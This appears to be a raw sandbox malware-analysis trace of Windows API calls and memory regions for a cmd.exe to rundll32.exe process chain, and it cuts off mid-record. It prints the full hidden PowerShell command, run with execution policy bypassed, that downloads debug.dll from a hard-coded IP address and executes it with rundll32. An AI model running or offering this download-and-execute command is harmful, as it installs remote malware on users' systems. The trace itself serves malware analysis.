[0044.607] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0044.607] GetLastError () returned 0x0 [0044.617] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0044.617] GetLastError () returned 0x0 [0044.619] CommandLineToArgvW (in: lpCmdLine=" C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll HOK", pNumArgs=0x510ef38 | out: pNumArgs=0x510ef38) returned 0x34bd98*="" [0044.619] GetLastError () returned 0x0 [0044.619] lstrlenW (lpString="C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll") returned 45 [0044.619] RtlMoveMemory (in: Destination=0x325c38, Source=0x34bdaa, Length=0x5c | out: Destination=0x325c38) [0044.619] lstrlenW (lpString="HOK") returned 3 [0044.619] RtlMoveMemory (in: Destination=0x325c38, Source=0x34be06, Length=0x8 | out: Destination=0x325c38) [0044.620] LocalFree (hMem=0x34bd98) returned 0x0 [0044.622] GetConsoleTitleW (in: lpConsoleTitle=0x325c38, nSize=0x400 | out: lpConsoleTitle="c:\\Windows\\System32\\cmd.exe - powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll');rundll32.exe 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll' HOK ") returned 0x121 [0044.622] GetLastError () returned 0x7f [0044.625] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll HOK", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpStartupInfo=0x325c38*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x25554f8 | out: lpCommandLine="\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll HOK", lpProcessInformation=0x25554f8*(hProcess=0x508, hThread=0x504, dwProcessId=0xae4, dwThreadId=0xae8)) returned 1 [0044.627] GetLastError () returned 0x7f [0044.643] CloseHandle (hObject=0x504) returned 1 [0044.643] GetLastError () returned 0x7f [0044.643] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\rundll32.exe", dwFileAttributes=0x0, psfi=0x325c38, cbFileInfo=0x160, uFlags=0x2000 | out: psfi=0x325c38) returned 0x6014550 [0044.645] SetConsoleTitleW (lpConsoleTitle="c:\\Windows\\System32\\cmd.exe - powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll');rundll32.exe 'C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll' HOK ") returned 1 [0044.646] GetLastError () returned 0x0 [0044.646] CloseHandle (hObject=0x508) returned 1 [0044.646] GetLastError () returned 0x0 [0044.649] SetEvent (hEvent=0x38c) returned 1 [0044.649] GetLastError () returned 0x0 [0044.649] SetEvent (hEvent=0x384) returned 1 [0044.649] GetLastError () returned 0x0 [0044.649] SetEvent (hEvent=0x3a0) returned 1 [0044.649] GetLastError () returned 0x0 [0044.649] SetEvent (hEvent=0x36c) returned 1 [0044.649] GetLastError () returned 0x0 [0044.649] SetEvent (hEvent=0x31c) returned 1 [0044.649] GetLastError () returned 0x0 [0044.650] SetEvent (hEvent=0x390) returned 1 [0044.650] GetLastError () returned 0x0 [0044.650] SetEvent (hEvent=0x2f8) returned 1 [0044.650] GetLastError () returned 0x0 [0044.650] SetEvent (hEvent=0x2fc) returned 1 [0044.650] GetLastError () returned 0x0 [0044.650] SetEvent (hEvent=0x32c) returned 1 [0044.650] GetLastError () returned 0x0 [0044.650] CoUninitialize () Thread: id = 23 os_tid = 0xaac Thread: id = 24 os_tid = 0xab0 Thread: id = 25 os_tid = 0xab4 [0029.304] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0029.305] ResetEvent (hEvent=0x3a8) returned 1 [0029.305] GetLastError () returned 0x0 Thread: id = 27 os_tid = 0xaec [0044.715] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0044.747] SetThreadUILanguage (LangId=0x0) returned 0x409 [0044.757] VirtualQuery (in: lpAddress=0x5f6e330, lpBuffer=0x5f6f330, dwLength=0x1c | out: lpBuffer=0x5f6f330*(BaseAddress=0x5f6e000, AllocationBase=0x55e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.757] VirtualQuery (in: lpAddress=0x5f6e44c, lpBuffer=0x5f6f44c, dwLength=0x1c | out: lpBuffer=0x5f6f44c*(BaseAddress=0x5f6e000, AllocationBase=0x55e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8e58, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.769] GetLastError () returned 0xcb [0044.780] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8e58, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.780] GetLastError () returned 0xcb [0044.899] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8e58, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.899] GetLastError () returned 0xcb [0044.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8e58, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.900] GetLastError () returned 0xcb [0044.933] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e8e58, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.933] GetLastError () returned 0xcb [0044.935] SetEvent (hEvent=0x508) returned 1 [0044.935] GetLastError () returned 0xcb [0044.935] SetEvent (hEvent=0x504) returned 1 [0044.935] GetLastError () returned 0xcb [0044.935] SetEvent (hEvent=0x50c) returned 1 [0044.935] GetLastError () returned 0xcb [0044.935] SetEvent (hEvent=0x508) returned 1 [0044.935] GetLastError () returned 0xcb [0044.935] SetEvent (hEvent=0x504) returned 1 [0044.935] GetLastError () returned 0xcb [0044.935] SetEvent (hEvent=0x524) returned 1 [0044.935] GetLastError () returned 0xcb [0044.935] SetEvent (hEvent=0x518) returned 1 [0044.935] GetLastError () returned 0xcb [0044.936] SetEvent (hEvent=0x51c) returned 1 [0044.936] GetLastError () returned 0xcb [0044.936] SetEvent (hEvent=0x520) returned 1 [0044.936] GetLastError () returned 0xcb [0044.936] SetEvent (hEvent=0x528) returned 1 [0044.942] GetLastError () returned 0xcb [0045.026] CoUninitialize () Thread: id = 174 os_tid = 0xd18 Process: id = "4" image_name = "rundll32.exe" filename = "c:\\windows\\system32\\rundll32.exe" page_root = "0x7eef7620" os_pid = "0xae4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xa50" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll HOK" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 703 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 704 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 705 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 706 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 707 start_va = 0x8e0000 end_va = 0x8edfff entry_point = 0x8e0000 region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\System32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe") Region: id = 708 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 709 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 710 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 711 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 712 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 713 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 714 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 715 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 716 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 717 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 718 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 719 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 720 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 721 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 722 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 723 start_va = 0x76c30000 end_va = 0x76c59fff entry_point = 0x76c30000 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 724 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 725 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 726 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 727 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 728 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 729 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 730 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 731 start_va = 0x60000 end_va = 0x60fff entry_point = 0x60000 region_type = mapped_file name = "rundll32.exe.mui" filename = "\\Windows\\System32\\en-US\\rundll32.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\rundll32.exe.mui") Region: id = 732 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 733 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 734 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 735 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 736 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 737 start_va = 0x610000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 738 start_va = 0x8f0000 end_va = 0x14effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 739 start_va = 0x5ef10000 end_va = 0x5ef95fff entry_point = 0x5ef10000 region_type = mapped_file name = "tempdebug.dll" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\tempdebug.dll") Region: id = 740 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 741 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 742 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 743 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 744 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 745 start_va = 0x5d0000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 746 start_va = 0x739d0000 end_va = 0x73a0ffff entry_point = 0x739da2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 747 start_va = 0x650000 end_va = 0x72efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 748 start_va = 0x736e0000 end_va = 0x736f2fff entry_point = 0x736e1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 749 start_va = 0x160000 end_va = 0x162fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 750 start_va = 0x773f0000 end_va = 0x773f4fff entry_point = 0x773f1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 751 start_va = 0x77040000 end_va = 0x77134fff entry_point = 0x77041865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 752 start_va = 0x76f00000 end_va = 0x77035fff entry_point = 0x76f01b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 753 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 754 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 755 start_va = 0x755b0000 end_va = 0x756ccfff entry_point = 0x755b158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 756 start_va = 0x75460000 end_va = 0x7546bfff entry_point = 0x7546238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 757 start_va = 0x76c60000 end_va = 0x76e5afff entry_point = 0x76c622d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 758 start_va = 0x76960000 end_va = 0x76994fff entry_point = 0x7696145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 759 start_va = 0x773e0000 end_va = 0x773e5fff entry_point = 0x773e1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 760 start_va = 0x170000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 761 start_va = 0x74940000 end_va = 0x74948fff entry_point = 0x74941220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 762 start_va = 0x200000 end_va = 0x25bfff entry_point = 0x200000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 763 start_va = 0x200000 end_va = 0x25bfff entry_point = 0x2235b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 764 start_va = 0x75340000 end_va = 0x7534bfff entry_point = 0x753410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 765 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 766 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 767 start_va = 0x766f0000 end_va = 0x76772fff entry_point = 0x766f23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 768 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 769 start_va = 0x5edd0000 end_va = 0x5ef05fff entry_point = 0x5edd0000 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\System32\\comsvcs.dll" (normalized: "c:\\windows\\system32\\comsvcs.dll") Region: id = 770 start_va = 0x741c0000 end_va = 0x741d3fff entry_point = 0x741c1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 771 start_va = 0x74e70000 end_va = 0x74e85fff entry_point = 0x74e72dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 772 start_va = 0x200000 end_va = 0x23bfff entry_point = 0x20128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 773 start_va = 0x200000 end_va = 0x23bfff entry_point = 0x20128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 774 start_va = 0x200000 end_va = 0x23bfff entry_point = 0x20128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 775 start_va = 0x200000 end_va = 0x23bfff entry_point = 0x20128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 776 start_va = 0x200000 end_va = 0x23bfff entry_point = 0x20128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 777 start_va = 0x74c20000 end_va = 0x74c5afff entry_point = 0x74c2128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 778 start_va = 0x730000 end_va = 0x82ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 779 start_va = 0x14f0000 end_va = 0x17befff entry_point = 0x14f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 780 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 781 start_va = 0x880000 end_va = 0x8bffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 782 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 783 start_va = 0x220000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 784 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 785 start_va = 0x753e0000 end_va = 0x753edfff entry_point = 0x753e1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 786 start_va = 0x1840000 end_va = 0x187ffff entry_point = 0x0 region_type = private name = "private_0x0000000001840000" filename = "" Region: id = 787 start_va = 0x18d0000 end_va = 0x190ffff entry_point = 0x0 region_type = private name = "private_0x00000000018d0000" filename = "" Region: id = 788 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 789 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 790 start_va = 0x5eae0000 end_va = 0x5eb81fff entry_point = 0x5eae0000 region_type = mapped_file name = "appwiz.cpl" filename = "\\Windows\\System32\\appwiz.cpl" (normalized: "c:\\windows\\system32\\appwiz.cpl") Region: id = 791 start_va = 0x73750000 end_va = 0x7377efff entry_point = 0x73750000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll") Region: id = 792 start_va = 0x70fc0000 end_va = 0x711fffff entry_point = 0x70fc66bd region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 793 start_va = 0x6ed80000 end_va = 0x6ed87fff entry_point = 0x6ed80000 region_type = mapped_file name = "osbaseln.dll" filename = "\\Windows\\System32\\osbaseln.dll" (normalized: "c:\\windows\\system32\\osbaseln.dll") Region: id = 794 start_va = 0x74600000 end_va = 0x746f4fff entry_point = 0x74610d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 795 start_va = 0x200000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 796 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 797 start_va = 0x742b0000 end_va = 0x7444dfff entry_point = 0x742de6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 798 start_va = 0x260000 end_va = 0x260fff entry_point = 0x260000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 799 start_va = 0x270000 end_va = 0x271fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 1383 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1384 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 1385 start_va = 0x74800000 end_va = 0x74820fff entry_point = 0x7480145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1386 start_va = 0x77420000 end_va = 0x77464fff entry_point = 0x774211e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1387 start_va = 0x560000 end_va = 0x563fff entry_point = 0x560000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1388 start_va = 0x570000 end_va = 0x595fff entry_point = 0x570000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db") Region: id = 1389 start_va = 0x5a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1390 start_va = 0x1910000 end_va = 0x1a10fff entry_point = 0x0 region_type = private name = "private_0x0000000001910000" filename = "" Region: id = 1391 start_va = 0x1910000 end_va = 0x1a10fff entry_point = 0x0 region_type = private name = "private_0x0000000001910000" filename = "" Region: id = 1392 start_va = 0x1910000 end_va = 0x1a10fff entry_point = 0x0 region_type = private name = "private_0x0000000001910000" filename = "" Region: id = 1393 start_va = 0x753f0000 end_va = 0x753fafff entry_point = 0x753f1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1394 start_va = 0x560000 end_va = 0x563fff entry_point = 0x560000 region_type = mapped_file name = "cversions.2.db" filename = 